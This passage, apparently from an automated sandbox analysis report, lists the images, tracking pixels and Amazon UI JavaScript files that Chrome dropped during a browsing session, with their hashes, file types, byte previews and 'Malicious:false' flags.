                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................,..............-..../.^.."j.....................|.-.\W=...^....L....zyp....t......................q=.>i{.6.$&..nm......................?.h..&...-......................4..x......4..Z:...................~......}..c'...5..K...*=6.O....MN.]\.u...f.z..V..<.6c.s..................mu....VkP+Q15.B..J...T.*..+....LL.#Y.. ...........y.:..zV.C.....Q...1.2c2.+(cNL...Q...re..Jq...................y<.EKm'.a.8.f. .93.c6pd.a.....&t...`...0y.....L.s..............L|.F...&T.e.J.$. c...i..&.7...%..-..k....g..... .........../MD..U~.w.D....1".Eh.1$.A3L.0*R._G...P/..............sW.........&s.L..C6.}Fs.L....&s.g0.k..nz^...z............&...=.M.V.-.U....X.j.T..P..R.Jd..<..<g..J:..............Q...Jg5.)..l.p.1.9..l...I..a3..Y...0.:.....=.7.........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3664
                                                                                                                                                                                                        Entropy (8bit):7.852907801710362
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T4obzLzzN8Z6SdbdDzVQZ4dmvXgVl8zBKmoPndBOl2shBju:Dh1speeegTwKmYdIl2shBC
                                                                                                                                                                                                        MD5:B0FDF0A5547A4543A5BC52E97F34CFA8
                                                                                                                                                                                                        SHA1:701FFA2B40E36511C8CE9E1A9D91E11DA75D5703
                                                                                                                                                                                                        SHA-256:44F3EECFE9B86F080D6AA9CA7DD26E9D14B7E1F16367E1150F20F0C7D100FC52
                                                                                                                                                                                                        SHA-512:03592279A4BB662CCDA7B3830C9FFADE63D9F3FAD728D73CD4685A72FEA7772BEDD95B2DD31A5133BAC5F8D69B58B96E2160AF38972858C529D6C8D1903D833A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........~....................................................!..12AQ.."#q..Ra.$r.B...........................................!1..Aa..............?....x.J....._.PGj...m_a.R..v........*PGj...m_a.R..v........*....v........*PGj...m_a.R..v........*PGj...m_a.R..v........*PGj...m_a.R..v........*PE|...*..W.*T.R..R....@T....T.rX...By..'.f..KJ..5...(........[t..)...w/4.&R.'q...4R....M......V]j.3.........7.s.@P..A..F... \.c....h&...].`.3..*4..a.o.7.q..W.Y.Cia...k...P.4 1(...8`7..=.m5.s.p..0..C..=.nB../...Q..kk.BIp.!...1.:Ha.%G.l!c.H.`....o`.T..;.-.._K.....(.....h35.....x..:.7>A...`.H`FC..H..pk........c#.!.C<.+g|...fY.......f.'H}B..*.Yj...3..2..T!h..H..}.p....9;.W.....T.^..A.X..6..\.7y..i....%)J.)J.)J.)J.)J....B.Q_*..J.JR...D.zF.V...E.H.e0p.}..e7.'uU...MW..mJ...`...?...x.f......o.[.iw......x7..r.O
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 153x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4777
                                                                                                                                                                                                        Entropy (8bit):7.914304731785313
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T6Z29tAuzp8hc8iRW+ytItDDpL8pJr0BpAF3R2w6B8C3G1+jB:bdzuc8fwDtQgpAFw9FB
                                                                                                                                                                                                        MD5:B5F3E877DA543ABAF0A51BAED47A71F2
                                                                                                                                                                                                        SHA1:57DB0A4CCE7EDFC7D1FEF6651BC61BAEE77ABB3C
                                                                                                                                                                                                        SHA-256:AFD146E8174EDACB8E40A2858A3A68CF6A963C06E70A74E3D8921D96A2B638FF
                                                                                                                                                                                                        SHA-512:0C00268A3C67BC919E7F783CF34A607C4A432F9795FD633219A05CFF93D6C4F20BD312946538F3AE08DDA4A61420C49B122AE4EE349823003166443DCCF84842
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!1A..Qaq.".......23BRr.#bs.....c....%5ET....$4..................................................1.!2.#3A.Q."BR............?..Y0.kiZ4.p..I-..V{..&......p.j3.L.].'2...m1S&5.k..q...Z..j..).n+,.W....+..b..Y.7.W..$2.3qs.r.t..7m&4n..K..{.....v...C./...g.*#....j......~WZ.x..ThR..:.._.7(../.......A...EjV.d.....+..E......5..~R...R.]..k.'......./j....g......zl.Mq..5.c..eh...j7.......4...+.........P..OK[..m5..C.B22.....o...lx.sZ...S..~%-Q....{..nV...x....J.[.....C.....H..UFn.....<..vh...{.....J.~e.G..u.R..) Y+.u..V..c.W..S....U.k........F.......f......s...dS...B.....z...m.V...jn ............v..d....n*.........Iegj.#....[....v..h......\.tk.2..............i...5{D-...n...&..:8U.J..Y.u...4...k8......u;E.X.-2...^U.LE..p..>I..j..uO.F...].a>.....C.'NR
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 284x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11670
                                                                                                                                                                                                        Entropy (8bit):7.950336826038475
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:OQ74CF1U/q+Xm9mml6jt3eyDgDEHpQIK2IDq/N85AJe7AVIfUwI8xsy:OQN0/Jymy6ZFUDEHqI0qRrVQUwxr
                                                                                                                                                                                                        MD5:32CE0A002402C6CD754C8935590B8CD9
                                                                                                                                                                                                        SHA1:C01A4FABB21EED6C2E5CAC53E6D7C4A6F6847467
                                                                                                                                                                                                        SHA-256:9C81B1CAC72AD0399A6DF4AC20EE473AA7CE7805DD25BA8DCD5B403C16293573
                                                                                                                                                                                                        SHA-512:74BEC130355D4C8E91D0A89AD3B977AF5E778765185F5805D2473601142D771901352730DB91E58027DEE8259963E741EDD78732398667273CEC7C1CCA7FB0C0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6..........................................................................<..o.E./.%L....h.......m..L..m.F...c...72.j.D.Zc...mM`[.Q8..i...m.z.]..h....R.1..6...}d..="S.V.....8...\..7.......:c..}/.\;.."..E...,.).....\$..Sr..tX...q...&.>{t..v.=.....33.<..Y.E.U.sO..|.....E.....#..3z...+v...O....+....7.sL...qF.......V6*M..v..r..$y.z;.n.1....G9{&.\rD.k....=>Y....k<....?.../j5YI...j....9.....r}.......D.b.ZD+....."L..`..5..S...^....v...s+..f..P9..b.]..).J..}Z..9DM.."......J......p...2..:mvo.w..Q.n...UG.."V...l[.4..m...j..P......k.......E......qdH.y[R%Q..r....F...X....C..R.Gr.2.w..7.^....i....8&f......KT.;....HI.#...[{cM`.Z.C./..a.]...g../.|.Y<...*.j.Z...#.....(.}......E..e.,\/../B....ucW.a.b....LJ.B..I....I,J.EL.2.Q1].yQ.X..:.GM.......5.....5Pu.........>S...D..u8...s..2..zF.S.SU.9.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3AbrowserQuiteFn%26pc%3D8127%26at%3D8127%26t%3D1723729140337%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7CmutObsYes%7Cnavbar%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7CperfYes%7Cfy_cdn_fr%7Cfy_cdn_mp%7Cadblk_no%7CmutObsActive%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7Caui%3Aajax%7Caui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%7Ccsm-feature-touch-enabled%3Afalse%7CbrowserQuiteFn%26viz%3Dvisible%3A4%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:8126
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                        MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                        SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                        SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                        SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3241
                                                                                                                                                                                                        Entropy (8bit):7.853920669258003
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T7dv4df+7eeeKlKwnsz6G0JUkRgPN/12Fwr8NvhKD:Hdv4d8eMlKfmG0GPR1CwITKD
                                                                                                                                                                                                        MD5:0D3E3C8112888804694EBF399BC8B00F
                                                                                                                                                                                                        SHA1:9BD8217B984A51E9D12A7268B00650DA6D28E6D1
                                                                                                                                                                                                        SHA-256:99AD2348330ECEB8B6B7609CB0BE8313ADF29A89433F08330543D1281565E2F9
                                                                                                                                                                                                        SHA-512:B76A285CB1E614265017A847A62C4C77757377AC3896FE451E9C9B69124A23E646156C3341948450AAC8991EF5212FF9446EACD0B1F1F4B11CF144C62B09EDBF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!..1A.Qa."q...2Bb....R..#3D...Scr.................................................!1.."qQa............?...bDD.D@K...>..T..r....Ke..".v....9SW.Z._....g9.].R..!)R$...._..&R....k..9m.....6..4.}2..........?0%.qu....k.M..k%.....+8...ulN.q.G.1L.x......e."%..4.ok...B...u^.u.JP.2..w}...NXom<QR.?.z.K}.....)\H.b.}.....{V..-^...%..!..dS...f...K,.Q5..I..." ""." ""." "".i.(../o<p...T\.-..~...I.i..MV.H..W.....Q./.g.=..3.*q..3.nj...U..pTU.O.ppX...fNi."....i....!5.E-.s+........y0veE.......+..8{..^..R.<..K`...c......]..".u...6s2v.....w#B.^.*.....9...T.Ce..8...rO:3...f..tm&..m..Zw.Qh..uu..@l........G.KF@2..2z..}y.....;.[R........*.;. ..:.'9.qr+=..8v.b..hp.....*......P"l9..........u..a:.zM{T....L...<...m7.i.q..*..g_."&.r" ""." ""." '?.V..[...J..#.).^.Y
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12602
                                                                                                                                                                                                        Entropy (8bit):7.91213063092888
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:YMYnJzuegeT+jgXEuddddddddd13MTj2mw0rGQg2BLUPeZp6F03raqm7sbe+6W6q:q9T+cUY3MTaZIg21xiqm4S+6W66b
                                                                                                                                                                                                        MD5:8469D7A400DFEC81B5D4B9EA31CD92DD
                                                                                                                                                                                                        SHA1:11812426128F185C6F0392ECB2FB61AA550005DF
                                                                                                                                                                                                        SHA-256:862666125B9D2A84160C863A1E2F31BBEDA84A39EF7A252AA675729A35301055
                                                                                                                                                                                                        SHA-512:DB62D128F0A4086A3E63243B1B7CA0F48DF8600954C5EDE667DF2C2F4C9BF0BB623B7D1F92F32E293C46E689B6CB7E6539E3EEE7E4C71B26EBBC26F1FBD2FCF5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................}.....3.C<.e...%....................6.e.b|.__/.o.$....W#...V...:.J................q.pS........;.k.]....%.......8..v.#.D<.......k?%.Yz`......;x...~so;`......k.....a......5..tMXg...{f&..}...y.p....'.M................$...0y.$ewg>Z3~Wg................!.ro....v.=...!..................5E.*.G...).*q...[...Z......r2.j........D...+.s...Cg8..7..o........?..w...?.#.?.....[.....s....O=.-z.\.h.Y 6n..3...........*.]rZ#'@(.......+.#......t.X..|Q....>.3........%#..l...r.X.u2.......[..4.....|............M.q..7m'-.1.L..........,Ti.P......r4.i......}%.Xz.....O}....C....C..P....c..c^....G4....N>.dF9.}W3.zVq..rE.~'.!g.m.a...........).)...] ....i..:.}.7....).n...=.b=.I..1.6d...e.Z.-./..T....%%!.6.P.0.{.1.@........x9
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (510)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):902
                                                                                                                                                                                                        Entropy (8bit):5.205086466616489
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2WZ/P3eAiarnyCFTjd6odi0Gx9g934jcASoN:RzryitFi0Gtn
                                                                                                                                                                                                        MD5:B33E102C16865CE9C5CBA2438083AE0A
                                                                                                                                                                                                        SHA1:9CAC174A6773DE9D3E22D1CA5423ACB03B497656
                                                                                                                                                                                                        SHA-256:A473A5AAC16EDC54CA599F6AF7D8A92BC6148748BA61AD9F265377194E419FF0
                                                                                                                                                                                                        SHA-512:DFB77B5CB9DA20A84219D68EBFC8CC3112D506AF8D8BC2839FFA846360053560CC054737FEF7CE2F5D07EA279254A1A7761A6598934345DB8A377FBAABCDAA3D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(b){var d=window.AmazonUIPageJS||window.P,e=d._namespace||d.attributeErrors,a=e?e("AmazonAPIRichContentBuzzAssets",""):d;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,d,e){b.when("jQuery").register("count-down-controller",function(a){return{countDown:function(b){var c=a(b),d=new Date(Date.UTC(c.data("year"),c.data("month")-1,c.data("day"),c.data("hour"),c.data("minute"),c.data("second"),0)),e=null;e=setInterval(function(){var a=d-Date.now(),b=Math.floor(a/.1E3);if(0>b)c.text("00:00"),clearInterval(e);else{a=Math.floor(b/3600%24);var f=Math.floor(b%60);b=("0"+Math.floor(b/60%60)).slice(-2);f=("0"+f).slice(-2);a=0<a?[a,b,f].join(":"):[b,f].join(":");c.text(a)}},1E3)}}});b.when("A","count-down-controller","ready").execute(function(a,b){var c=document.querySelectorAll(".amazon-api-rc-count-down-timer");a.each(c,function(a){b.countDown(a)})})});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (539)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):14537
                                                                                                                                                                                                        Entropy (8bit):5.109451087636145
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:FXEvadr4ziN9k8X1y/wxW/+Irty2vrOTTnm6nflxCClbO8TID23RVhJje8CAE4Av:FUvaV47K1y/wxW/+Irv8frRgsN4L19
                                                                                                                                                                                                        MD5:2F9EADD4CA0C94A2924719DC293335ED
                                                                                                                                                                                                        SHA1:7E87FA031017AB7CAEE9F4BA5A2458B93867C42D
                                                                                                                                                                                                        SHA-256:2E5C4E5DD76D19BD957864A5485880B7DD5381BE31835DC30DBB276D82652A89
                                                                                                                                                                                                        SHA-512:468C17D7F11A4AA83C0161C768855F38416A635759D42F87FD65D906E4072D1A5BCF6CEE02C796FB618BCE852C421A05AD60ECC71CCE7142620D93E722148306
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/31jdfgcsPAL.js?AUIClients/AmazonUIFormControlsJS
                                                                                                                                                                                                        Preview:(function(d){var q=window.AmazonUIPageJS||window.P,n=q._namespace||q.attributeErrors,a=n?n("AmazonUIFormControlsJS","AmazonUI"):q;a.guardFatal?a.guardFatal(d)(a,window):a.execute(function(){d(a,window)})})(function(d,q,n){d.register("prv:a-form-states",function(){function a(a){return function(b){b.removeClass(a)}}function c(a){return function(b){b.addClass(a)}}function b(a){return function(b){return b.hasClass(a)}}return{disabled:{cssClass:"a-form-disabled",disabled:!0,enterState:function(a){a.addClass(this.cssClass);.a.prop("disabled",this.disabled)},exitState:function(a){a.removeClass(this.cssClass);a.prop("disabled",!this.disabled)},match:function(a){return a.hasClass(this.cssClass)&&a.prop("disabled")}},error:{enterState:c("a-form-error"),exitState:a("a-form-error"),match:b("a-form-error")},inactive:{enterState:c("a-form-inactive"),exitState:a("a-form-inactive"),match:b("a-form-inactive")},selected:{enterState:c("a-form-selected"),exitState:a("a-form-selected"),match:b("a-form-sele
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 172x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2301
                                                                                                                                                                                                        Entropy (8bit):7.738768297997184
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rJnNBKwMs7Q/SvEZ3aZq/nC0QPl8hjkQgMMQTsJcBunyiR+:Tgu8Qq63amnC0w2hucTsbyiR+
                                                                                                                                                                                                        MD5:3717FAB7498586302D6F0E2775FB0CAF
                                                                                                                                                                                                        SHA1:4184F4198309C46EAF9FE4302A8683E137D789D5
                                                                                                                                                                                                        SHA-256:C6854A0E9D22F8DA5AADB1F9DCCAFA2F9935BB3C7A1D56CC580E200D50A851E1
                                                                                                                                                                                                        SHA-512:2228031BD9D32C5C5458BA52A2A0544A2203643A4BC77792ABC2D613416E5E72CD988F1F3E9F749794E1B833DCF47FE3119BBB8192B4CB6A66AA02CD44213D6D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."............................................................1!Aq...2BQa.......4s...RSbcr..."$3.T.....................................................?.......7.i.tz_...6.d.e%..3..'y.7...HV ......^....v..Em.w....G.%...H.....ZO.....mT...+.`;..b>..[b<~%...9@%]..O..l..."Y.}PH@....S...'.j...8.S..r...."..j.E...C.B.]-4...O.~.|...>&..=I.b.b.sc0...:.c\h>x...zD.I.O1...V.i`./..T..Kn..zr..Q.?.Rv..w...v.....O[gEip....R[e..$r...%j....\.t....t 4..."k]....).^A$..K .d.@.........n+%..T..Yi.V.B....r...)].ze$.<.....E..........n.......\e.....a+....\...c)..j..Bk...w[.F...:[o.>z..|.d..?.........9.B.(l...=).d.J.:e.........iD...P...!.UY.#)s&a..u...:g..SR Z.8[.H...'d.IJW<.Nv..N.....Zl..w...R^.!.iN..0.W.O. nO..=_..H.N.4.|L......o...U...3.XY_COn.......R.]/_f]....../.}.;.... ....."......A$\....t.6...eR..]....6........$
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 158x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13231
                                                                                                                                                                                                        Entropy (8bit):7.960347291854105
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Xy7PxHmkIXFmDqEWnbTQBl8dBEZOrNTOFa/EWHQC:ibxHmB13EmbTfEg86T
                                                                                                                                                                                                        MD5:E2EB60631B1046DAECA0933169AEFE58
                                                                                                                                                                                                        SHA1:3AA55D763730C2EB1BA95EBFB2428D4E0B4E6DBC
                                                                                                                                                                                                        SHA-256:8C5D477D61B7A9382CC08151B0C69B22D89A19C050E945179A7FBCFE83B7F631
                                                                                                                                                                                                        SHA-512:84B26FB0CD7E1DA316BC93F21B341608DC517C516A22A4EAA99B034BA4118C46548EDBB7D804AD221E21C2132C8068691BAF148C1D1D992150AB18E87BB0BEC1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1"A2Q..aq.#B......RS...34CTcrst.......$5Dbd...%....................................................!.1.."Qa2A.#B...q...3..............?..t...v.i..AN.......lW..-r.s:..'?.....k........&Q.{rb.F@.n<...k.....29._......v..}..G......^..'Y`F..kh...?..X...k...Oe..H?...'_@#[.%..?x.o."Y...Y.B..;37..$.s.$....r........... .u.#.......N...-d*..{..hs6@.J\......[ 4..]3../..q[E..X.I(..Y...2+...Z.....$.![..&Y4..`G~{....?......5.P.`j.\.{....E.1p@<..:....#8.@...D|.|.z..7.-l...C2......{.,....-..U...l.Z*...'.}f..rTq.........4a...6..5.e..<o....]...2w....q..pE..)@[.b.....&ehr..r....c...+...Z.W.M.F}R....NVU.Z........F...".=G....2.......a.\....f.r......V...5V..~.....oV...&.".....y...*?{.N.........'_q:..&...O...G.eG.u...'..G.d........V....A.....Q..?.5.jY(+.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):33246
                                                                                                                                                                                                        Entropy (8bit):6.850698176268014
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:U3FL8i7aqQWb8E9VFgTBKfsQQsvpg+gRZWvCrGkQUFwEi4cVvhrzPWMlxI6qV0g6:QFUfzECTgxmtrG0Ih3PXxIAgTG+xxuT
                                                                                                                                                                                                        MD5:0FFD22517A39416843D685EA48FC3488
                                                                                                                                                                                                        SHA1:FDB5DC6546057F00639B0C5985107F8C6843E141
                                                                                                                                                                                                        SHA-256:ED87A3758C95C13C999730AC43C8AAD16EAC5E397475724D15563E2EB345F25C
                                                                                                                                                                                                        SHA-512:FC499A60EC0337EDB8C47F881E4F085AC30585EE5119A525D66D24A4BF2F2EFCC568702DCC3579414A04FBC703A055190B31FD84E52F5FF335712F106F31CE9E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/51W4KUiHQaL._SX1500_.jpg
                                                                                                                                                                                                        Preview:......JFIF..............Exif..II*...............4IJP........4?jumb....jumdc2pa.........8.q.c2pa...4.jumb...Gjumdc2ma.........8.q.urn:uuid:30e8ecf4-3ac9-4de5-bb55-b713f6cf7836.....jumb...)jumdc2as.........8.q.c2pa.assertions.....jumb...&jumdcbor.........8.q.c2pa.actions.....cbor.gactions..factionkc2pa.editedmsoftwareAgentmAdobe FireflyqdigitalSourceTypexShttp://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia....jumb...(jumdcbor.........8.q.c2pa.hash.data....|cbor.jexclusions..estart..flength.4Kdnamenjumbf manifestcalgfsha256dhashX ....7..:.a4.~I..Y*..."u.B...-..cpadI.............jumb...$jumdc2cl.........8.q.c2pa.claim.....cbor.hdc:titleoGenerated imageidc:formatjimage/jpegjinstanceIDx(xmp.iid:A4DEEE94472B11EF8FE8FE57D3F77758oclaim_generatorx7Adobe_Photoshop/25.12.0 adobe_c2pa/0.9.3 c2pa-rs/0.31.0tclaim_generator_info..dnameoAdobe Photoshopgversiong25.12.0.isignaturex.self#jumbf=c2pa.signaturejassertions..curlx'self#jumbf=c2pa.assertions/c2pa.actionsdhashX J
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 306x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):16953
                                                                                                                                                                                                        Entropy (8bit):7.948365865167762
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:ASODgsY/keyXCEeCwpIagGu/vaITm18wO79l+YTDMHAmpderu:6z9WBYtigzb79lv3mpIy
                                                                                                                                                                                                        MD5:6F8B7BD378A046CA6B82745F5B7A9A57
                                                                                                                                                                                                        SHA1:F1A888CBE81577CFAC141787F67EBA79E7CF8ED8
